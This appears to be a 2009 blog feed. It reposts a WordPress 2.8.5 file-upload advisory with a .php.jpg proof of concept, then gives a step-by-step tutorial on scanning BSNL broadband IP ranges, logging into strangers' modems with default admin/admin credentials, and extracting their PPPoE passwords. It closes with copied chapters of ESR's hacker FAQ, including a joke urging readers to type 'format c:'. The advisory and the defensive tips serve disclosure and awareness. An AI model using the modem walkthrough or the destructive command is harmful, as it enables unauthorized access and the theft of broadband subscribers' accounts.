Ankit Kumar Agarwal » Tutorials

WordPress 2.8.5 Unrestricted File Upload Arbitrary PHP Code Execution

Ankit Kumar Agarwal — Fri, 13 Nov 2009 16:11:16 +0000

Recently Dawid Golunski released a wp 2.8.5 exploit which let users to execute arbitatry PHP codes.

After i had a conversation with him it was concluded that this exploied is confiend to a few apchae servers only and other servers are safe!! Below is a copy of his discolsure and our conversation:-

Disclosure

==============================

===============
- Release date: November 11th, 2009
- Discovered by: Dawid Golunski
- Severity: Moderately High
=============================================

I. VULNERABILITY
————————-
WordPress <= 2.8.5 Unrestricted File Upload Arbitrary PHP Code Execution

II. BACKGROUND
————————-
WordPress is a state-of-the-art publishing platform with a focus on aesthetics, web standards,
and usability. WordPress is both free and priceless at the same time. More simply, WordPress is
what you use when you want to work with your blogging software, not fight it.

III. DESCRIPTION
————————-

Wordpress allows authorised users to add an attachment to a blog post.
It does not sanitize provided file properly before moving it to an uploads directory.

The part of the code responsible for uploading files looks as follows:

wp-admin/includes/file.php:
—[cut]—
line 217:
function wp_handle_upload( &$file, $overrides = false, $time = null ) {
—[cut]—
// All tests are on by default. Most can be turned off by $override[{test_name}] = false;
$test_form = true;
$test_size = true;

// If you override this, you must provide $ext and $type!!!!
$test_type = true;
$mimes = false;
—[cut]—

// A properly uploaded file will pass this test. There should be no reason to override this one.
if (! @ is_uploaded_file( $file['tmp_name'] ) )
return $upload_error_handler( $file, __( ‘Specified file failed upload test.’ ));

// A correct MIME type will pass this test. Override $mimes or use the upload_mimes filter.
if ( $test_type ) {
$wp_filetype = wp_check_filetype( $file['name'], $mimes );

extract( $wp_filetype );

if ( ( !$type || !$ext ) && !current_user_can( ‘unfiltered_upload’ ) )
return $upload_error_handler( $file,
__( ‘File type does not meet security guidelines. Try another.’ ));

if ( !$ext )
$ext = ltrim(strrchr($file['name'], ‘.’), ‘.’);

if ( !$type )
$type = $file['type'];
} else {
$type = ”;
}

// A writable uploads dir will pass this test. Again, there’s no point overriding this one.
if ( ! ( ( $uploads = wp_upload_dir($time) ) && false === $uploads['error'] ) )
return $upload_error_handler( $file, $uploads['error'] );

$filename = wp_unique_filename( $uploads['path'], $file['name'], $unique_filename_callback );

// Move the file to the uploads dir
$new_file = $uploads['path'] . “/$filename”;
if ( false === @ move_uploaded_file( $file['tmp_name'], $new_file ) ) {
return $upload_error_handler( $file,
sprintf( __(‘The uploaded file could not be moved to %s.’ ), $uploads['path'] ) );
}
—[cut ]—

From the above code we can see that provided filename gets checked with:
$wp_filetype = wp_check_filetype( $file['name'], $mimes );

Here is how the wp_check_filetype() function looks like:

wp-includes/functions.php:
—[cut]—
line 2228:

function wp_check_filetype( $filename, $mimes = null ) {
// Accepted MIME types are set here as PCRE unless provided.
$mimes = ( is_array( $mimes ) ) ? $mimes : apply_filters( ‘upload_mimes’, array(
‘jpg|jpeg|jpe’ => ‘image/jpeg’,
‘gif’ => ‘image/gif’,
‘png’ => ‘image/png’,
‘bmp’ => ‘image/bmp’,
‘tif|tiff’ => ‘image/tiff’,
‘ico’ => ‘image/x-icon’,
‘asf|asx|wax|wmv|wmx’ => ‘video/asf’,
‘avi’ => ‘video/avi’,

—[cut, more mime types]—
line 2279:

$type = false;
$ext = false;

foreach ( $mimes as $ext_preg => $mime_match ) {
$ext_preg = ‘!\.(‘ . $ext_preg . ‘)$!i’;
if ( preg_match( $ext_preg, $filename, $ext_matches ) ) {
$type = $mime_match;
$ext = $ext_matches[1];
break;
}
}

return compact( ‘ext’, ‘type’ );
}

We can see that type of the file gets set to a predefined MIME type that matches supplied
extension, and that the extension is obtained from a regexp that matches a mime ext. string after
the LAST dot.
If extension is not on the list $type and $ext will be set to FALSE and wordpress will
produce an error (“File type does not meet security guidelines. Try another”).

Let’s look at the other check that is performed on the filename before a file gets uploaded,
that is a call to the following function:
$filename = wp_unique_filename( $uploads['path'], $file['name'], $unique_filename_callback );

wp-includes/functions.php:
line 2096:
function wp_unique_filename( $dir, $filename, $unique_filename_callback = null ) {
// sanitize the file name before we begin processing
$filename = sanitize_file_name($filename);

—[cut, code that only matters if uploaded file already exists]—
line 2126:
return $filename;
}

To have a complete view on file sanitization performed by wordpress we need to look into the
sanitize_file_name() function:

wp-includes/formatting.php:
line 601:
function sanitize_file_name( $filename ) {
$filename_raw = $filename;
$special_chars = array(“?”, “[", "]“, “/”, “\\”, “=”, “<”, “>”, “:”, “;”, “,”, “‘”, “\”",
“&”, “$”, “#”, “*”, “(“, “)”, “|”, “~”, “`”, “!”, “{“, “}”, chr(0));
$special_chars = apply_filters(’sanitize_file_name_chars’, $special_chars, $filename_raw);
$filename = str_replace($special_chars, ”, $filename);
$filename = preg_replace(‘/[\s-]+/’, ‘-’, $filename);
$filename = trim($filename, ‘.-_’);
return apply_filters(’sanitize_file_name’, $filename, $filename_raw);
}

This function removes special characters shown above, replaces spaces and consecutive dashes with
a single dash, trims period, dash and underscore from beginning and end of the filename.

The sanitization process appears quite extensive however it does not take into account files that
have multiple extensions.
It is possible to upload a file containing an arbitrary PHP script with an extension of ‘.php.jpg’
and execute it by requesting the uploaded file directly.

The execution of the PHP code despite the .php.jpg extension is possible because Apache
allows for multiple extensions. Here is a quote from Apache docs regarding this matter:

”
Files can have more than one extension, and the order of the extensions is normally irrelevant.
For example, if the file welcome.html.fr maps onto content type text/html and language French then
the file welcome.fr.html will map onto exactly the same information. If more than one extension is
given that maps onto the same type of meta-information, then the one to the right will be used,
except for languages and content encodings. For example, if .gif maps to the MIME-type image/gif
and .html maps to the MIME-type text/html, then the file welcome.gif.html will be associated with
the MIME-type text/html.

Care should be taken when a file with multiple extensions gets associated with both a MIME-type
and a handler. This will usually result in the request being handled by the module associated with
the handler. For example, if the .imap extension is mapped to the handler imap-file
(from mod_imagemap) and the .html extension is mapped to the MIME-type text/html, then the file
world.imap.html will be associated with both the imap-file handler and text/html MIME-type.
When it is processed, the imap-file handler will be used, and so it will be treated as a
mod_imagemap imagemap file.
”

IV. PROOF OF CONCEPT
————————-
Browser is enough to replicate this issue. Simply log in to your wordpress blog as a low privileged
user or admin. Create a new post and use the media file upload feature to upload a file:

test-image.php.jpg

containing the following code:

phpinfo();
?>

After the upload you should receive a positive response saying:

test-vuln.php.jpg
image/jpeg
2009-11-11

and it should be possible to request the uploaded file via a link:
http://link-to-our-wp-unsecured-blog.com/wp-content/uploads/2009/11/test-vuln.php.jpg

thus executing the PHP code it contains.

In the above code example, a php info page will be shown.

V. BUSINESS IMPACT
————————-
An attacker that has already obtained login details (for example by stealing user’s cookies with
an XSS attack) to the blog as one of the existing users could exploit this vulnerability to get
access to the system in the Apache user’s context.
From there he could use local bugs to further escalate the privileges. Apache account would be
enough in most cases to view the source codes and gain access to the databases.

Some wordpress users of the 2.8.5 release have reported that some php files have been added to
their wordpress directory. It could be possible that they have been hit by this bug. Therefore it
is important to take some countermeasures as soon as possible.

VI. SYSTEMS AFFECTED
————————-
Most likely all of the wordpress releases contain this bug. Including the current hardened stable
release 2.8.5 and the beta version.

VII. SOLUTION
————————-
Vendor has been informed about the bug. Currently wordpress developers and contributors are in
the process of bug hunting and fixing reported bugs in beta versions before the new stable release,
so hopefully it should not take long for them to take this problem into account.

You can apply the temporary solutions for this problem which I provide below before an official
patch is made.

You can create a .htaccess file in the uploads dir (wordpress/wp-content/uploads) with
the following content:

deny from all

order deny,allow
allow from all

Adjust allowed file extensions in the brackets if necessary.
This will prevent Apache from serving files with double extensions inside the uploads directory.

Alternatively you can try to patch the source code yourself by editing the
wp-admin/includes/file.php file and the wp_handle_upload() function it contains. An example patch
could be to add the following three lines of code at the line 260:

// Fix Unrestricted File Upload Arbitrary PHP Code Execution bug, return if more than 1 extension provided
if ( count(explode(‘.’, $file['name'])) > 2 );
return $upload_error_handler( $file, __( ‘File type does not meet security guidelines. Try another.’ ));

VIII. REFERENCES
————————-
http://www.wordpress.org
http://httpd.apache.org/docs/2.2/mod/mod_mime.html#multipleext

IX. CREDITS
————————-
This vulnerability has been discovered by Dawid Golunski
golunski (at) onet (dot) eu

Greetings go to: robxt, sajanek, xsoti, bart, falcon (for the old time’s sake and complexmind

X. REVISION HISTORY
————————-
November 11th, 2009: Initial release

XI. LEGAL NOTICES
————————-
The information contained within this advisory is supplied “as-is” with no warranties or guarantees of fitness of
use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.

Counter question by me

Hi,
i was testing this and i get just the url echoed nothing else.The php info command didnt work.
am i missing something?
Morover

For example, if .gif maps to the MIME-type image/gif
and .html maps to the MIME-type text/html, then the file welcome.gif.html will be associated with
the MIME-type text/html.

So doesnt that mean that the file will be associated with jpg only?
sorry if you think this noobis.But i am not able to figure it out.
Thanks

Ankit kumar agarwal

His reply

Hi,

Yes, you missed the other part of the quote from apache docs That is:

“Care should be taken when a file with multiple extensions gets associated with both a MIME-type

and a handler. This will usually result in the request being handled by the module associated with

the handler. For example, if the .imap extension is mapped to the handler imap-file

(from mod_imagemap) and the .html extension is mapped to the MIME-type text/html, then the file

world.imap.html will be associated with both the imap-file handler and text/html MIME-type.

When it is processed, the imap-file handler will be used, and so it will be treated as a

mod_imagemap imagemap file.”

A lot of systems that use apache/php have their apache configured so that it handles .php files via:

AddHandler php5-script .php

as opposed to :

AddType application/x-httpd-php .php (which is probably your case)

According to the above, handlers have priority over mime types thus .php.jpg will be executed as a php.

I’m going to clarify this on bugtraq soon so it is clear for others too.

Hope this clarifies it.

Take care,

Dawid

His public Explanation of what i asked

Hi,
Just wanted to add a quick update on affected systems since I forgot to mention webservers along with wordpress versions in my advisory.
Some people are wondering why the vulnerability doesn’t work on their system.

I’m pretty sure that the exploit won’t work on web servers other than Apache (as they probably won’t process extensions other than the last one). So not apache based servers are probably safe here.
Whether it will work on your Apache server or not depends on your mod_php configuration.
The exploit won’t work on servers where PHP scripts handling has been configured as follows:

SetHandler application/x-httpd-php

If the exploit doesn’t work for you this is most likely the case.

The exploit however will work on systems where php scripts are handled via the following setting in the php.conf:

AddHandler php5-script .php

which I think is quite common. For example Apache distributed in Red Hat based systems seem to have php configured in such a way.

Hope this clears the matter a bit.

Regards,
Dawid

Thats it..dont misuse above information!!

How to Hack BSNL brod band aacounts?

Ankit Kumar Agarwal — Wed, 27 May 2009 07:42:00 +0000

Disclaimer : The information provided below is for educational purpose only. The author is not responsible for any misuse of the information and discourages any illegal use of it.

Bsnl DataOne Broadband continues to grow as one the most popular broadband services in India with high speed facilities of upto 2 mpbs. But a large number of users of this service are vulnerable to hacker attacks because discovering and hacking the vulnerable victims of this network is shockingly simple. If you are a Bsnl Broadband user then immediately assess the security of your internet connection and take appropriate steps to secure yourself.

First lets see how simple it is to hack bsnl dataone broadband usernames and passwords. For this you shall need a ipscanner tool called Angry IP Scanner http://www.angryziber.com/ipscan/ or anything similar.

Ok so lets begin… Get your IP from :

www.ipmango.com

Step 1 : Start Angry IP scanner and goto options > ports. Type in 80 in the first ports textbox and click ok.

Then goto options > options ; in the display section select “only open ports” and click ok&save.

Now on the main screen put in the ip scan range as something 59.*.0.0 – 59.*.255.255 (for e.g. 59.95.2.3) and click the start button. And the list that shall follow next are the victims. In this example we choose the range 59.95.0.0 – 59.95.255.255. You will be surprised at the number of victims you discover.

Step 2 : Pick the ip-address of any of them and open up your browser and type in http://59.*.*.* (the * should be replaced by the values from the ip you are using. A box will popup asking for username and password. Enter the username : admin and password : admin .There is a high chance that you will be able to login with that username and password.

admin-admin is the default username and password that is set while manufacturing the adsl modem devices.

What follows next is the modem administration panel.

Simply search for the “WAN” option and click it. On the next page you will find the username and password of that user. now right-click on the page and click view source. in Mozilla/Opera This frame -> view frame source

Now in the source code search for this : INPUT TYPE=”PASSWORD”

and the value field of this input element will have the password

if its not there as in case of D-Link DSL 502T ADSL Routers the search for this

input type=”hidden” name=”connection0:pppoe:settings/password” value=”password” id=”uiPostPppoePassword”

and the value field will have the password

Well each steps take less than 1 minute so getting username passwords wont take even 2 minutes and is easier than sending a mail.

And this exposes the weak security of bsnl broadband users.

Well this is not a weakness but more of a mis-configuration which leads to insecurity. If you understand networking then you would probably realise that it was merely logging into the remote administration service of the modem and nothing else. This was not really hacking but a simple search of victims who are absolutely ignorant of their weak security on the internet.

Most routers have an option where remote management can be disabled. In other words, you can only connect to the configuration interface from the internal network, not the WAN(Internet) side. You would definitely want to make sure remote management is not active to protect yourself.

Note : On SmartAX MT880 eventhough Remote Management is disabled , it permits remote logins from over the Internet. So change your mode administration passwords immediately.

The problem is that the professionals at Bsnl are ignorant of such simplicity of networking and unable to advise the users or guide them to take proper security measures leaving their customers and themselves absolutely unsecure.

Now lets check a few more options related to this issue. A bsnl broadband modem can be used in two modes. RFC Bridged mode and pppoe mode.

In the RFC Bridged mode the device behaves like a modem device that is attached to your computer and you use some dialup software to dial into the isp through this modem.This is PPPOE from the PC and the adsl device is a good modem. This mode is safer as the username password are on your pc and nothing is on the modem.

In the PPPOE mode the adsl device becomes a router – a distinct network device with many features enabled. In this mode the username password is stored in the modem which will dial to the isp and establish the internet connectivity. The computers will just connect to this router who would be their primary gateway. Now this is the mode where the risk exists.

If remote administration is enabled the remote users from the internet can login to this modems administration panel. Now the main problem is the default admin username-password which most users dont change due to ignorance. “admin-admin” is pair that works in most cases giving you full access to the modems internals. What follows next is simple as drinking a glass of orange juice.

Many users install firewalls and think they are safe, but they fail to understand that the firewall protects their PC not the “router” since the topology is like

(PC) -> router -> internet

So how should you secure yourself ?

1. Use RFC Bridged mode if it is sufficient for you.

2. Change the default admin password of your modem.

3. Disable wan ping reply . ( this will prevent the hackers from directly discovering your pc when it is on the internet)

4. Disable remote configuration feature.

5. Check your broadband usage on a regular basis and compare it with your own surfing schedules to check whether someone else has used it or not. If suspiscious usage is indicated then immediately change your bband password as well. Or a better suggestion would be to change broadband passwords on a regular basis.

Try to spread the security awareness to your friends and other relatives who are using Bsnl broadband and encourage them to secure their internet connectivity.

Disclaimer : The information provided above is for educational purpose only. The main purpose of the author is to spread awareness amongst users. The author is not responsible for any misuse of the information and discourages any illegal use of it.

How to become a hacker-ch 4

Ankit Kumar Agarwal — Fri, 21 Nov 2008 18:09:00 +0000

chapter-4

Table of contents

Points For Style

Other Resources

Frequently Asked Questions

The Hacker/Nerd Connection

Contrary to popular myth, you don’t have to be a nerd to be a hacker. It does help, however, and many hackers are in fact nerds. Being something of a social outcast helps you stay concentrated on the really important things, like thinking and hacking.

For this reason, many hackers have adopted the label ‘geek’ as a badge of pride — it’s a way of declaring their independence from normal social expectations (as well as a fondness for other things like science fiction and strategy games that often go with being a hacker). The term ‘nerd’ used to be used this way back in the 1990s, back when ‘nerd’ was a mild pejorative and ‘geek’ a rather harsher one; sometime after 2000 they switched places, at least in U.S. popular culture, and there is now even a significant geek-pride culture among people who aren’t techies.

If you can manage to concentrate enough on hacking to be good at it and still have a life, that’s fine. This is a lot easier today than it was when I was a newbie in the 1970s; mainstream culture is much friendlier to techno-nerds now. There are even growing numbers of people who realize that hackers are often high-quality lover and spouse material.

If you’re attracted to hacking because you don’t have a life, that’s OK too — at least you won’t have trouble concentrating. Maybe you’ll get a life later on.

Points For Style

Again, to be a hacker, you have to enter the hacker mindset. There are some things you can do when you’re not at a computer that seem to help. They’re not substitutes for hacking (nothing is) but many hackers do them, and feel that they connect in some basic way with the essence of hacking.

· Learn to write your native language well. Though it’s a common stereotype that programmers can’t write, a surprising number of hackers (including all the most accomplished ones I know of) are very able writers.

· Read science fiction. Go to science fiction conventions (a good way to meet hackers and proto-hackers).

· Train in a martial-arts form. The kind of mental discipline required for martial arts seems to be similar in important ways to what hackers do. The most popular forms among hackers are definitely Asian empty-hand arts such as Tae Kwon Do, various forms of Karate, Kung Fu, Aikido, or Ju Jitsu. Western fencing and Asian sword arts also have visible followings. In places where it’s legal, pistol shooting has been rising in popularity since the late 1990s. The most hackerly martial arts are those which emphasize mental discipline, relaxed awareness, and control, rather than raw strength, athleticism, or physical toughness.

· Study an actual meditation discipline. The perennial favorite among hackers is Zen (importantly, it is possible to benefit from Zen without acquiring a religion or discarding one you already have). Other styles may work as well, but be careful to choose one that doesn’t require you to believe crazy things.

· Develop an analytical ear for music. Learn to appreciate peculiar kinds of music. Learn to play some musical instrument well, or how to sing.

· Develop your appreciation of puns and wordplay.

The more of these things you already do, the more likely it is that you are natural hacker material. Why these things in particular is not completely clear, but they’re connected with a mix of left- and right-brain skills that seems to be important; hackers need to be able to both reason logically and step outside the apparent logic of a problem at a moment’s notice.

Work as intensely as you play and play as intensely as you work. For true hackers, the boundaries between “play”, “work”, “science” and “art” all tend to disappear, or to merge into a high-level creative playfulness. Also, don’t be content with a narrow range of skills. Though most hackers self-describe as programmers, they are very likely to be more than competent in several related skills — system administration, web design, and PC hardware troubleshooting are common ones. A hacker who’s a system administrator, on the other hand, is likely to be quite skilled at script programming and web design. Hackers don’t do things by halves; if they invest in a skill at all, they tend to get very good at it.

Finally, a few things not to do.

· Don’t use a silly, grandiose user ID or screen name.

· Don’t get in flame wars on Usenet (or anywhere else).

· Don’t call yourself a ‘cyberpunk’, and don’t waste your time on anybody who does.

· Don’t post or email writing that’s full of spelling errors and bad grammar.

The only reputation you’ll make doing any of these things is as a twit. Hackers have long memories — it could take you years to live your early blunders down enough to be accepted.

The problem with screen names or handles deserves some amplification. Concealing your identity behind a handle is a juvenile and silly behavior characteristic of crackers, warez d00dz, and other lower life forms. Hackers don’t do this; they’re proud of what they do and want it associated with their real names. So if you have a handle, drop it. In the hacker culture it will only mark you as a loser.

Other Resources

Paul Graham has written an essay called Great Hackers, and another on Undergraduation, in which he speaks much wisdom.

There is a document called How To Be A Programmer that is an excellent complement to this one. It has valuable advice not just about coding and skillsets, but about how to function on a programming team.

I have also written A Brief History Of Hackerdom.

I have written a paper, The Cathedral and the Bazaar, which explains a lot about how the Linux and open-source cultures work. I have addressed this topic even more directly in its sequel Homesteading the Noosphere.

Rick Moen has written an excellent document on how to run a Linux user group.

Rick Moen and I have collaborated on another document on How To Ask Smart Questions. This will help you seek assistance in a way that makes it more likely that you will actually get it.

If you need instruction in the basics of how personal computers, Unix, and the Internet work, see The Unix and Internet Fundamentals HOWTO.

When you release software or write patches for software, try to follow the guidelines in the Software Release Practice HOWTO.

If you enjoyed the Zen poem, you might also like Rootless Root: The Unix Koans of Master Foo.

Frequently Asked Questions

Q:Which are the best hacking tools?

A:Google,Wiki and your brain.

Q:

How do I tell if I am already a hacker?

A:

Ask yourself the following three questions:

· Do you speak code, fluently?

· Do you identify with the goals and values of the hacker community?

· Has a well-established member of the hacker community ever called you a hacker?

If you can answer yes to all three of these questions, you are already a hacker. No two alone are sufficient.

The first test is about skills. You probably pass it if you have the minimum technical skills described earlier in this document. You blow right through it if you have had a substantial amount of code accepted by an open-source development project.

The second test is about attitude. If the five principles of the hacker mindset seemed obvious to you, more like a description of the way you already live than anything novel, you are already halfway to passing it. That’s the inward half; the other, outward half is the degree to which you identify with the hacker community’s long-term projects.

Here is an incomplete but indicative list of some of those projects: Does it matter to you that Linux improve and spread? Are you passionate about software freedom? Hostile to monopolies? Do you act on the belief that computers can be instruments of empowerment that make the world a richer and more humane place?

But a note of caution is in order here. The hacker community has some specific, primarily defensive political interests — two of them are defending free-speech rights and fending off “intellectual-property” power grabs that would make open source illegal. Some of those long-term projects are civil-liberties organizations like the Electronic Frontier Foundation, and the outward attitude properly includes support of them. But beyond that, most hackers view attempts to systematize the hacker attitude into an explicit political program with suspicion; we’ve learned, the hard way, that these attempts are divisive and distracting. If someone tries to recruit you to march on your capitol in the name of the hacker attitude, they’ve missed the point. The right response is probably “Shut up and show them the code.”

The third test has a tricky element of recursiveness about it. I observed in the section called “What Is a Hacker?” that being a hacker is partly a matter of belonging to a particular subculture or social network with a shared history, an inside and an outside. In the far past, hackers were a much less cohesive and self-aware group than they are today. But the importance of the social-network aspect has increased over the last thirty years as the Internet has made connections with the core of the hacker subculture easier to develop and maintain. One easy behavioral index of the change is that, in this century, we have our own T-shirts.

Sociologists, who study networks like those of the hacker culture under the general rubric of “invisible colleges”, have noted that one characteristic of such networks is that they have gatekeepers — core members with the social authority to endorse new members into the network. Because the “invisible college” that is hacker culture is a loose and informal one, the role of gatekeeper is informal too. But one thing that all hackers understand in their bones is that not every hacker is a gatekeeper. Gatekeepers have to have a certain degree of seniority and accomplishment before they can bestow the title. How much is hard to quantify, but every hacker knows it when they see it.

Q:

Will you teach me how to hack?

A:

Since first publishing this page, I’ve gotten several requests a week (often several a day) from people to “teach me all about hacking”. Unfortunately, I don’t have the time or energy to do this; my own hacking projects, and working as an open-source advocate, take up 110% of my time.

Even if I did, hacking is an attitude and skill you basically have to teach yourself. You’ll find that while real hackers want to help you, they won’t respect you if you beg to be spoon-fed everything they know.

Learn a few things first. Show that you’re trying, that you’re capable of learning on your own. Then go to the hackers you meet with specific questions.

If you do email a hacker asking for advice, here are two things to know up front. First, we’ve found that people who are lazy or careless in their writing are usually too lazy and careless in their thinking to make good hackers — so take care to spell correctly, and use good grammar and punctuation, otherwise you’ll probably be ignored. Secondly, don’t dare ask for a reply to an ISP account that’s different from the account you’re sending from; we find people who do that are usually thieves using stolen accounts, and we have no interest in rewarding or assisting thievery.

Q:

How can I get started, then?

A:

The best way for you to get started would probably be to go to a LUG (Linux user group) meeting. You can find such groups on the LDP General Linux Information Page; there is probably one near you, possibly associated with a college or university. LUG members will probably give you a Linux if you ask, and will certainly help you install one and get started.

Q:

When do you have to start? Is it too late for me to learn?

A:

Any age at which you are motivated to start is a good age. Most people seem to get interested between ages 15 and 20, but I know of exceptions in both directions.

Q:

How long will it take me to learn to hack?

A:

That depends on how talented you are and how hard you work at it. Most people who try can acquire a respectable skill set in eighteen months to two years, if they concentrate. Don’t think it ends there, though; in hacking (as in many other fields) it takes about ten years to achieve mastery. And if you are a real hacker, you will spend the rest of your life learning and perfecting your craft.

Q:

Is Visual Basic a good language to start with?

A:

If you’re asking this question, it almost certainly means you’re thinking about trying to hack under Microsoft Windows. This is a bad idea in itself. When I compared trying to learn to hack under Windows to trying to learn to dance while wearing a body cast, I wasn’t kidding. Don’t go there. It’s ugly, and it never stops being ugly.

There is a specific problem with Visual Basic; mainly that it’s not portable. Though there is a prototype open-source implementations of Visual Basic, the applicable ECMA standards don’t cover more than a small set of its programming interfaces. On Windows most of its library support is proprietary to a single vendor (Microsoft); if you aren’t extremely careful about which features you use — more careful than any newbie is really capable of being — you’ll end up locked into only those platforms Microsoft chooses to support. If you’re starting on a Unix, much better languages with better libraries are available. Python, for example.

Also, like other Basics, Visual Basic is a poorly-designed language that will teach you bad programming habits. No, don’t ask me to describe them in detail; that explanation would fill a book. Learn a well-designed language instead.

One of those bad habits is becoming dependent on a single vendor’s libraries, widgets, and development tools. In general, any language that isn’t fully supported under at least Linux or one of the BSDs, and/or at least three different vendors’ operating systems, is a poor one to learn to hack in.

Q:

Would you help me to crack a system, or teach me how to crack?

A:

No. Anyone who can still ask such a question after reading this FAQ is too stupid to be educable even if I had the time for tutoring. Any emailed requests of this kind that I get will be ignored or answered with extreme rudeness.

Q:

How can I get the password for someone else’s account?

A:

This is cracking. Go away, idiot.

Q:

How can I break into/read/monitor someone else’s email?

A:

This is cracking. Get lost, moron.

Q:

How can I steal channel op privileges on IRC?

A:

This is cracking. Begone, cretin.

Q:

I’ve been cracked. Will you help me fend off further attacks?

A:

No. Every time I’ve been asked this question so far, it’s been from some poor sap running Microsoft Windows. It is not possible to effectively secure Windows systems against crack attacks; the code and architecture simply have too many flaws, which makes securing Windows like trying to bail out a boat with a sieve. The only reliable prevention starts with switching to Linux or some other operating system that is designed to at least be capable of security.

Q:

I’m having problems with my Windows software. Will you help me?

A:

Yes. Go to a DOS prompt and type “format c:”. Any problems you are experiencing will cease within a few minutes.

Q:

Where can I find some real hackers to talk with?

A:

The best way is to find a Unix or Linux user’s group local to you and go to their meetings (you can find links to several lists of user groups on the LDP site at ibiblio).

(I used to say here that you wouldn’t find any real hackers on IRC, but I’m given to understand this is changing. Apparently some real hacker communities, attached to things like GIMP and Perl, have IRC channels now.)

Q:

Can you recommend useful books about hacking-related subjects?

A:

I maintain a Linux Reading List HOWTO that you may find helpful. The Loginataka may also be interesting.

For an introduction to Python, see the introductory materials on the Python site.

Q:

Do I need to be good at math to become a hacker?

A:

No. Hacking uses very little formal mathematics or arithmetic. In particular, you won’t usually need trigonometry, calculus or analysis (there are exceptions to this in a handful of specific application areas like 3-D computer graphics). Knowing some formal logic and Boolean algebra is good. Some grounding in finite mathematics (including finite-set theory, combinatorics, and graph theory) can be helpful.

Much more importantly: you need to be able to think logically and follow chains of exact reasoning, the way mathematicians do. While the content of most mathematics won’t help you, you will need the discipline and intelligence to handle mathematics. If you lack the intelligence, there is little hope for you as a hacker; if you lack the discipline, you’d better grow it.

I think a good way to find out if you have what it takes is to pick up a copy of Raymond Smullyan’s book What Is The Name Of This Book?. Smullyan’s playful logical conundrums are very much in the hacker spirit. Being able to solve them is a good sign; enjoying solving them is an even better one.

Q:

What language should I learn first?

A:

XHTML (the latest dialect of HTML) if you don’t already know it. There are a lot of glossy, hype-intensive bad HTML books out there, and distressingly few good ones. The one I like best is HTML: The Definitive Guide.

But HTML is not a full programming language. When you’re ready to start programming, I would recommend starting with Python. You will hear a lot of people recommending Perl, and Perl is still more popular than Python, but it’s harder to learn and (in my opinion) less well designed.

C is really important, but it’s also much more difficult than either Python or Perl. Don’t try to learn it first.

Windows users, do not settle for Visual Basic. It will teach you bad habits, and it’s not portable off Windows. Avoid.

Q:

What kind of hardware do I need?

A:

It used to be that personal computers were rather underpowered and memory-poor, enough so that they placed artificial limits on a hacker’s learning process. This stopped being true in the mid-1990s; any machine from an Intel 486DX50 up is more than powerful enough for development work, X, and Internet communications, and the smallest disks you can buy today are plenty big enough.

The important thing in choosing a machine on which to learn is whether its hardware is Linux-compatible (or BSD-compatible, should you choose to go that route). Again, this will be true for almost all modern machines. The only really sticky areas are modems and wireless cards; some machines have Windows-specific hardware that won’t work with Linux.

There’s a FAQ on hardware compatibility; the latest version is here.

Q:

I want to contribute. Can you help me pick a problem to work on?

A:

No, because I don’t know your talents or interests. You have to be self-motivated or you won’t stick, which is why having other people choose your direction almost never works.

Try this. Watch the project announcements scroll by on Freshmeat for a few days. When you see one that makes you think “Cool! I’d like to work on that!”, join it.

Q:

Do I need to hate and bash Microsoft?

A:

No, you don’t. Not that Microsoft isn’t loathsome, but there was a hacker culture long before Microsoft and there will still be one long after Microsoft is history. Any energy you spend hating Microsoft would be better spent on loving your craft. Write good code — that will bash Microsoft quite sufficiently without polluting your karma.

Q:

But won’t open-source software leave programmers unable to make a living?

A:

This seems unlikely — so far, the open-source software industry seems to be creating jobs rather than taking them away. If having a program written is a net economic gain over not having it written, a programmer will get paid whether or not the program is going to be open-source after it’s done. And, no matter how much “free” software gets written, there always seems to be more demand for new and customized applications. I’ve written more about this at the Open Source pages.

Q:

Where can I get a free Unix?

A:

If you don’t have a Unix installed on your machine yet, elsewhere on this page I include pointers to where to get the most commonly used free Unix. To be a hacker you need motivation and initiative and the ability to educate yourself. Start now…

—————————-thread ends——————————–

chapter-1
chapter-2
chapter-3
chapter-4

source:Article written by Sir ESR

How to become a hacker-ch 3

Ankit Kumar Agarwal — Thu, 20 Nov 2008 19:21:00 +0000

Chapter-3

Table of Contents

Status in the Hacker Culture

1. Write open-source software

2. Help test and debug open-source software

3. Publish useful information

4. Help keep the infrastructure working

5. Serve the hacker culture itself

Like most cultures without a money economy, hackerdom runs on reputation. You’re trying to solve interesting problems, but how interesting they are, and whether your solutions are really good, is something that only your technical peers or superiors are normally equipped to judge.

Accordingly, when you play the hacker game, you learn to keep score primarily by what other hackers think of your skill (this is why you aren’t really a hacker until other hackers consistently call you one). This fact is obscured by the image of hacking as solitary work; also by a hacker-cultural taboo (gradually decaying since the late 1990s but still potent) against admitting that ego or external validation are involved in one’s motivation at all.

Specifically, hackerdom is what anthropologists call a gift culture. You gain status and reputation in it not by dominating other people, nor by being beautiful, nor by having things other people want, but rather by giving things away. Specifically, by giving away your time, your creativity, and the results of your skill.

There are basically five kinds of things you can do to be respected by hackers:

1. Write open-source software

The first (the most central and most traditional) is to write programs that other hackers think are fun or useful, and give the program sources away to the whole hacker culture to use.

(We used to call these works “free software”, but this confused too many people who weren’t sure exactly what “free” was supposed to mean. Most of us now prefer the term “open-source” software).

Hackerdom’s most revered demigods are people who have written large, capable programs that met a widespread need and given them away, so that now everyone uses them.

But there’s a bit of a fine historical point here. While hackers have always looked up to the open-source developers among them as our community’s hardest core, before the mid-1990s most hackers most of the time worked on closed source. This was still true when I wrote the first version of this HOWTO in 1996; it took the mainstreaming of open-source software after 1997 to change things. Today, “the hacker community” and “open-source developers” are two descriptions for what is essentially the same culture and population — but it is worth remembering that this was not always so.

2. Help test and debug open-source software

They also serve who stand and debug open-source software. In this imperfect world, we will inevitably spend most of our software development time in the debugging phase. That’s why any open-source author who’s thinking will tell you that good beta-testers (who know how to describe symptoms clearly, localize problems well, can tolerate bugs in a quickie release, and are willing to apply a few simple diagnostic routines) are worth their weight in rubies. Even one of these can make the difference between a debugging phase that’s a protracted, exhausting nightmare and one that’s merely a salutary nuisance.

If you’re a newbie, try to find a program under development that you’re interested in and be a good beta-tester. There’s a natural progression from helping test programs to helping debug them to helping modify them. You’ll learn a lot this way, and generate good karma with people who will help you later on.

3. Publish useful information

Another good thing is to collect and filter useful and interesting information into web pages or documents like Frequently Asked Questions (FAQ) lists, and make those generally available.

Maintainers of major technical FAQs get almost as much respect as open-source authors.

4. Help keep the infrastructure working

The hacker culture (and the engineering development of the Internet, for that matter) is run by volunteers. There’s a lot of necessary but unglamorous work that needs done to keep it going — administering mailing lists, moderating newsgroups, maintaining large software archive sites, developing RFCs and other technical standards.

